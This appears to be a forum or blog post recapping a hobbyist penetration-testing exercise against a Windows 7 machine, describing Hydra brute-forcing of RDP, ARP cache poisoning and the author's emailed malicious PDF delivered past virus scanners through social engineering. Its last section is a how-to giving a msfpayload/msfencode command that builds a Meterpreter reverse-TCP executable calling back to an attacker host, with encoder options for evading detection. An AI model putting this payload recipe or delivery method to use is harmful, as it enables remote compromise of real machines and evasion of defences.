Negative, none were able to exploit the Windows7 machine. It was a "basic out of the box build" according to Harold. <So embarrassing for our small but dedicated list of festers.....(names withheld to protect the innocent :) )
If you remember, Harold Wong is something of an "evangelist" promoting "good source" over open or closed source, and especially educating people about the needs for secure sources while debugging many of the myths upom which sits M$ bashing.
See Wong's blog:
http://blogs.technet.com/b/haroldwong/See one of Harold's video interviews on Exchange Server 2010:
http://www.youtube.com/watch?v=rpa9ARgjUBU
Harold Wong left open just two ports on his Windows 7, via wireless device connection to Internet Untrusted Network (gangplank); the most significant was RDP 3389. Hydra was deployed to get the name and password, albeit unsuccessfully. Since Harold employs secure passwords (8 characters, truly random with one shifted character and one number), our 3389 dictionary attack was not going to be successful. Harold's son engaged in gaming from the machine itself, under well engineered headphones, during the whole adventure.
Most of the festers concentrated on port 3389, of course.
Port 2638 was ignored.
The port 2638 is used by Sybase Adaptive Server Anywhere
(ASA) -- a relational database management program developed and
distributed by Sybase that can be used as a standalone server,
multi-user multi-client server or a network server. The port 2638 is used for direct
communication, data sharing, and file transfer with desktop systems,
workgroup computers and other mobile environment. The port 2638 is most
commonly used as an access point for mobile phones and smart phones with
a remote server. Symantec Endpoint Protection also uses port 2638 as default. Our group did not determine without a doubt which application was using this port. Implementation of the Symantec Endpoint Protection Remote Console requires the user or installation process create a protocol definition for TCP port 2638 with ACL. None of our festers attempted to exploit that port.
It was generally assumed (and hinted by me for all festers last month) that best possible attack vector for this exercise was layer 8 of the OSI model - the human error layer or insecure computing. However, our festers spent a great deal of time with XHydra and CAIN arp cache poisoning, RDP protocol verification (patched for greater security historically and incorporated into Windows7) ; they swiftly degenerated from a team approach to finding other network devices of interest, trading lies and stealing candy from Gangplankhq.com's generous TREAT bowls.
At 15:25 (25 minutes past the end of the exercise) I put together a quick attachment exploit for Adobe, ensuring "through social engineering" it would be opened, and creatively delivered it, having to deftly ensure delivery past various virus checkers with the pdf intact. Unfortunately I had given Harold Wong a great number of hints, such as dangerous Adobe pdf's available, and I had hinted to others that pdf creation for custom reverse shell was fun and trivial from within Metasploit (***See below).
Therefore, Harold Wong was not using Adobe for reading such files and my exploit fell on deaf ears, so to speak, bringing up a nasty pop-up error to the user indicating that the pdf executed more than was expected. Granted in a real world example, Adobe would be used, shipping by default. NOTE also, that the virus checking software did not at any time find my exploit attachment and scrub it. While any such exploit was QUICKLY discovered by GOOGLE MAIL and quarantined, that Adobe attachment email exploit WAS SENT HAPPILY THROUGH Microsoft's email servers directly to Harold Wong. Of course another fun item would be a GoToAssist cookie
GENERALLY, I take myself out of the flag capture events, since I end up supporting the fest process. The purpose of the event is training and fun for the festers, not to watch Lisa take all the flags <grin> (there is NO SUBSTITUTE for experience).
In a real world example, an attacker also would have properly attached an RDP exploit (which was not even identified by Google's virus attachment scrapers) which would have instantly provided us with FLAG JOY. For real fun
So, once again, Linux installed "out of the box" opening an insecure pdf would create the same effect as Windows7. Linux installed per defaults, running on an untrusted network, with secure passwords and comparable firewalling is equal, is it not?
HowTo Meterpreter//Metasploit PDF:
"output.exe" was either created from compiling a payload using template.c
in the Metasploit folder or by using the following CLI:
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | \
msfencode -b '' -t exe -o meterpreter.exe
Here's what it does:
Part 1
1. msfpayload calls a payload, in this case meterpreter (reverse tcp).
2. LHOST (listening host) is set to A.B.C.D (IP-address, I think DNS hostnames are supported too.)
3. LPORT (listening port) is set to 8080, set this to anything above
1024 if you're on Linux since anything below requires root privileges.
4. R means RAW (pure unreadable binary machine-code).
5. | means pipe the output and \ is used because msfencode is on a new line.
Part 2
1. msfencode is used for encoding.
2. -b means bad characters, in this case there's none. (this is almost always needed in real exploitation)
3. -t means type and since "exe" without quotes is written, the type is set to exe of course.
4. -o means output, cause we need to send the output somewhere, in this
case: meterpreter.exe which could also be output.exe etc.
Short explanation of the pipe progress:
First msfpayload creates the payload by using an easily customizeable shell-
code with all the right ARGS (arguments) that you need, then it is sent to a
pipe which sends all the binary / RAW output to msfencode, which encodes
this and compiles this into a valid exe file.
With msfencode it is also possible to use:
-a (the architecture to use, irrelevant in this case)
-e (the encoder to use, f.ex. x86/shikata_gi_nai)
With the -t switch it is possible to choose the following types:
c, elf, exe, java, perl, raw, ruby and vba
Please use the: -h (help) switch or write --help or just "help" (without quotes)
in Metasploit for further help since there is a lot of nice info when you use that.
I also recommend that you read the nice documentation, it's really worth it.
You don't have to read the developer documentation, but I think some of it
was actually quite a nice read.
FREE ONLINE VERSION of METASPLOIT UNLEASHED:
http://www.offensive-security.com/metasploit-unleashed/
Of course, set up a virtual and unpatched Windows XP machine to play with as well!